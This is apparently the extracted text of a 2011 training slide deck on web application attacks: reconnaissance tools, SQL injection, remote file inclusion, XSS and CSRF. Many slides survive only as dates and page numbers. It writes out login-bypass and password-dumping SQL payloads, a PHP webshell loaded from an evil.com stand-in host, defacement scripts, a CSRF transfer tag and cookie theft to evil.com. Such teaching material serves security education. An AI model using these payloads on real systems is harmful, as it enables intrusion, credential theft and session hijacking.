Professional Documents
Culture Documents
20 Sept 2011
Overview
Information Gathering SQL Injection File Inclusion XSS (Cross Site Scripting)
20 Sept 2011
Information Gathering
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 3
Finding an apple in a basket will be like finding a needle in a haystack if you dont know what an apple is !
- Syed Zainudeen -
20 Sept 2011
20 Sept 2011
20 Sept 2011
20 Sept 2011
xprobe2
Usage: xprobe2 <host> xprobe2 www.website.com
20 Sept 2011
nmap in action
20 Sept 2011
10
amap
Manual:
nc / telnet/putty
Usage: nc <host> <port>
openssl
20 Sept 2011
14
20 Sept 2011
15
SQL Injection
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 16
SQL injection is like asking for extra plate/tissue/etc when all the waiter is expecting is your order
- Syed Zainudeen -
20 Sept 2011
17
20 Sept 2011
18
Login bypass
20 Sept 2011
19
Logged in as admin !
20 Sept 2011
20
The SQL without the comment is SELECT * FROM accounts WHERE username='' OR 1=1 #' AND password=''
20 Sept 2011
23
Boolean:
OR
TRUE
Means:
20 Sept 2011
25
All the rows will be returned but since the first row is the username admin, we logs in as admin
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen.
26
Exploits of a Mom
xkcd.com/327
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 27
20 Sept 2011
28
20 Sept 2011
29
BTW, the rules won't help if you are facing a secure web application
20 Sept 2011
30
' OR 1=1 # ' OR 1=1 -- ' ' OR ''=' ' OR 1=1 OR ' ' OR 1=1 LIMIT 1#
. use your imagination (and logic)
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 31
20 Sept 2011
32
20 Sept 2011
33
Examples:
' union select group_concat(user,password),2,3 from users# ' union select group_concat(user,':',password),2,3 from users#
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 34
Pwned !
20 Sept 2011
35
Installing a webshell
This is done using SELECT INTO OUTFILE . If we were attacking a xampp installation:
Pwned !!!
We access the shell through: http://<host>/test.php?c=<OS command>
20 Sept 2011
37
File injection is akin to how bacteriophage injects bacteria with its genetic material
- Syed Zainudeen -
20 Sept 2011
39
include()
Include() and other similar function has the ability to include any file to be as part as the script that is currently executing
Depending on the server configuration, include() can access not just local file path, but also web URLs
20 Sept 2011
42
Sample attack
What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and host it at http://evil.com/script.txt
All the attacker needs to do now is to invoke the web application with this URL:
http://website.com/?page=http://evil.com/script.txt &c=ls
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 43
20 Sept 2011
44
20 Sept 2011
45
20 Sept 2011
46
20 Sept 2011
47
RFI exploitation
1. Find a vulnerable URL
(e.g. http://192.168.0.1/web/index.php?page=login.php)
2. Host our script on a web server (e.g. http://evil.com/shell.txt) 3. Exploit it (run our script) by requesting
http://192.168.0.1/web/index.php?page=http://evil.co m/shell.txt
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 48
In order to execute dir command, we can request for the following URL
http://192.168.0.1/web/index.php?page=http://evil .com/shell.txt&c=dir
20 Sept 2011
49
PWNED !!!
20 Sept 2011
50
HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST PLACE ?
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 51
Once the script is accessible locally by the server, exploitation can proceed.
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 52
20 Sept 2011
54
What is XSS ?
XSS is a vulnerability that allows an attacker to inject client-side code on a webpage The client-side code can be of any client-side scripting language; Javascript, CSS, HTML, etc
20 Sept 2011
55
Example:
What's your name: Ali<script>alert('XSS')</script>
20 Sept 2011
56
XSS in action
20 Sept 2011
57
Types of XSS
There are 2 types of XSS Reflected XSS Stored XSS (non-persistent) (persistent)
20 Sept 2011
58
Reflected vs Stored
In a reflected XSS, the injected string is used only once and discarded (not stored)
E.g. search function
In a stored XSS, the injected string is first stored in a DB and later loaded for display
E.g. forum, guestbook, log
20 Sept 2011
59
Reflected XSS
The vulnerable page will only display user injected script if he/she follows a certain link/URL
The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>
20 Sept 2011
60
20 Sept 2011
61
Stored XSS
The vulnerable page will display user injected script just by visiting to a vulnerable site (that has been injected)
The malicious script in not visible in the URL (since it is usually loaded from DB)
20 Sept 2011
62
20 Sept 2011
63
20 Sept 2011
64
Webpage defacement
This is effective against stored XSS Creates an illusion of being hacked ! (Not a real hack) The way to deface is up to the creativity of the attacker. Some examples: <script>document.body.innerHTML="Hacked!"</script> <iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100% ;height:100%"></iframe>
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 65
20 Sept 2011
66
20 Sept 2011
67
CSRF explained
Let say that a user is logged in to a bank (Low Security Bank, lsbank.com) A user then browse to other sites that contains the following (XSS injected) code: <img src="http://lsbank.com/transfer?amount=1000&to=hacker_acc &submit=true" />
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 69
Cookie stealing
In CSRF, an attacker issues a command that gets executed using session information (cookie) of a victim
The cookie is not captured in CSRF. The attacker doesn't know the victim's cookie.
But using XSS, we can steal user cookie
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 71
If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim
20 Sept 2011
72
20 Sept 2011
75
This script will cause the user cookie to be sent to evil.com The attacker can log the cookies using any server side scripting language at evil.com
20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 76
20 Sept 2011
77
Normal User
20 Sept 2011
Each user has unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between normal user and web admin
Copyright (C) 2011, Syed Zainudeen. 79
SESSIONID=i45h0t3w4h
Attacker Evil.com
Due to an XSS vulnerability in Web Server, an attacker has injected some javascript code that steals visitor's session ID . 20 Sept 2011 Copyright (C) 2011, Syed Zainudeen. 80
Attacker
20 Sept 2011
The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Copyright (C) 2011, Syed Zainudeen.Web Admin. 81
Thank you !
20 Sept 2011
82